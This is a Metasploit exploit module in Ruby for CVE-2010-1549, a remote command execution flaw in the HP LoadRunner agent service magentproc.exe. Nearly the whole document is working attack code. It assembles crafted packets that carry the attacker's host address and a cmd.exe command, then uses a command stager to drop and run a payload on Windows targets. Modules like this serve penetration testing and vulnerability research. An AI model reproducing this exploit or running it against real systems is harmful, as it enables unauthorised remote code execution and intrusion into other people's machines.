HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::CmdStager  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution",  
'Description' => %q{  
This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50  
and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are  
also most likely vulneable if the (non-default) SSL option is turned off.  
By sending a specially crafted packet, an attacker can execute commands remotely.  
The service is vulnerable provided the Secure Channel feature is disabled (default).  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Unknown', # Original discovery # From Tenable Network Security  
'aushack' # metasploit module  
],  
'References' =>  
[  
['CVE', '2010-1549'],  
['ZDI', '10-080'],  
['BID', '39965'],  
['URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=c00912968']  
],  
'Payload' => { 'BadChars' => "\x0d\x0a\x00" },  
'Platform' => 'win',  
'Targets' =>  
[  
# Note: software reportedly supports Linux - may also be vulnerable.  
['Windows (Dropper)',  
'Platform' => 'win',  
'Arch' => [ARCH_X86, ARCH_X64]  
],  
],  
'Privileged' => false,  
'Stance' => Msf::Exploit::Stance::Aggressive,  
'DisclosureDate' => 'May 06 2010',  
'DefaultTarget' => 0))  
  
register_options([Opt::RPORT(54345)])  
end  
  
def autofilter  
true  
end  
  
def execute_command(cmd, _opts = {})  
guid = Rex::Text.encode_base64(Rex::Text.rand_text_alphanumeric(17))  
randstr = Rex::Text.rand_text_alpha(16)  
server_name = Rex::Text.rand_text_alpha(7)  
server_ip = datastore['LHOST']  
server_port = Rex::Text.rand_text_numeric(4)  
# If linux is one day supported, cmd1 = /bin/sh and cmd2 = -c cmd  
cmd1 = "C:\\Windows\\system32\\cmd.exe"  
cmd2 = "/C \"#{cmd}\""  
  
pkt1 = [0x19].pack('N') + guid + '0'  
  
pkt2 = [0x6].pack('N') + [0x0].pack('N') + "(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})"  
pkt2 << "(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00"  
pkt2 << [0x7530].pack('N')  
  
pkt3 = [4 + pkt2.length].pack('N') + pkt2  
  
pkt4 = [0x1c].pack('N') + [0x05].pack('N') + [0x01].pack('N') + randstr + pkt3  
  
pkt5 = [pkt4.length].pack('N') + pkt4  
  
pkt6 = [0x437].pack('N') + [0x0].pack('N') + [0x31].pack('N') + [1].pack('N') + [0x31000000].pack('N')  
pkt6 << [cmd1.length].pack('N') + cmd1 + "\x00" + [cmd2.length].pack('N') + cmd2 + [0x0].pack('N') + [0x0].pack('N')  
  
pkt7 = [4 + pkt6.length].pack('N') + pkt6  
  
pkt8 = [0x18].pack('N') + [0x04].pack('N') + randstr + pkt7  
  
pkt9 = [pkt8.length].pack('N') + pkt8  
  
sploit = pkt1 + pkt5 + pkt9  
  
connect  
sock.put(sploit)  
disconnect  
end  
  
def exploit  
print_status('Sending payload...')  
execute_cmdstager(linemax: 1500)  
end  
end  
`